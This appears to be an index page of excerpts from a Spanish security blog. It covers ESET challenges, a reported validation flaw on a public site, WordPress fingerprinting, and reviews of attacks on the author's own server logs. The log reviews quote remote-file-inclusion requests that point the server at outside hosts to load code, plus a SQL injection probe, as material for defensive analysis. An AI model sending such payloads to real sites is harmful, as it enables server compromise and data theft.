ESET Latino América realiza habitualmente diversos retos para hacer pensar a sus lectores.
El reto 12 de ESET trata de hacer que dos robots colisionen en una linea infinita. Os invito a ver la descripción original en el sitio de ESET Latino América en http://blogs.eset-la.com/laboratorio/2010/05/22/desafio-12-eset/
El principal problema que tenemos es que la linea al ser infinita [...]
En el segundo reto forense, vamos a buscar indicios que ayude a la policía a encontrar a un fugitivo (Ann).
Ann ha comunicado a su amante donde se va ha esconder. Para poder descubirlo tendremos que buscar la información que ha sido enviada por correo de Ann a su amante.
Las preguntas que tenemos que responder son:
1. [...]
Buscando un formación sobre las redes públicas españolas he podido descubrir un fallo leve de seguridad que ya ha sido notificado a los administradores del sitio.
El error era causado al no validar correctamente la variable “titulo”, que se usa para escribir el título de las gráficas mostradas.
Os dejo una imagen sobre el fallo.
En el ejemplo [...]
Vamos a ver el último ataque que parado por SaveBot:
El atacante tenia la ip: 222.122.197.xxx y se conectó desde el puerto 33302.
El atacante procedía de Korea, de un hosting koreano con 114 hosting virtuales.
El User-Agent usado ha sido “libwww-perl/5.79″, por lo que SaveBot lo ha detenido.
El ataque:
cat=5///vwar/backup/errors.php?error=http://xxxxxxxxxxx.com/images/kontol.txt?
El dominio está registrdo en Ucrania y el hosting [...]
Como ya ocurriera en el post “Primeros ataques, siguiendo el rastro“, recientemente he revisado mis log y he detectado varios ataque automatizados. En esta ocasión solo buscaban fallos RFI (remote file include).
El día 2010/03/19 a las 16:52:15 desde 95.110.224.XXX (Italia)
Petición: “?p=153//errors.php?error=www.xxxxxxxxxxx.or.kr/id?″
User-Agent: libwww-perl/5.805
Intentaba incluir un código alojado en una web coreana con IP 211.202.2.XXX
El día 2010/03/12 [...]
Recientemente he visto en Pentest.es un programa que dada un IP o lista de IPs busca los dominios que le pertenecen.
Para este objetivo hace uso de el API de Bing. Me ha parecido muy buena idea, y yo he creado una función que realiza lo mismo. Desde aquí invito a que añadan a WebSearch si [...]
He estado haciendo una revisión de los log del sistema y he encontrado unos que he recibido unos cuantos ataques.
A continución he realizado una pequeña investigación sobre los incidentes.
Los ataques que he detectado han sido de dos tipos.
Inyecciones SQL:
El día 2009/10/18 a las 21:14:52 desde 209.208.106.XXX (EEUU)
Petición: “?m=1+order+by+87652–&hello=%00″
User-Agent: DataCha0s/2.0
En la petición podemos ver como se [...]
Haciendo uso de lo explicado en el articulo “Saca la versión de Wordpress gracias a Gears” he decidido crear un pequeño script en Python que nos diga la versión de WP que se está usando.
La manera más simple para obtener este dato de la versión es buscar el valor del campo “generator” en los metadatos [...]
¿Que es TrackBack?
TackBack es un sistema de notificación de mención, es decir, sirve para saver quien ha mencionado o escrito sobre tu post.
¿Como funciona TrackBack?
Para informar al blog de que se escribe sobre lo primero es que tiene que tener el sistema de TrackBack.
Mandaremos a una petición POST al sitio que vamos a mencionar. La [...]
Bueno, cuando estuve mirando el error del FPD observé que existía un fichero que mostraba con un contenido demasiado explicito, en un principio pesé que podía ser un fallo por el que se descubriría la versión del wordpress instalada, movido por un dato muy claro:
“version” : “ae52efa2f066ffc235840dc615f051d7″
En ese momento me mosqueo un poco y me [...]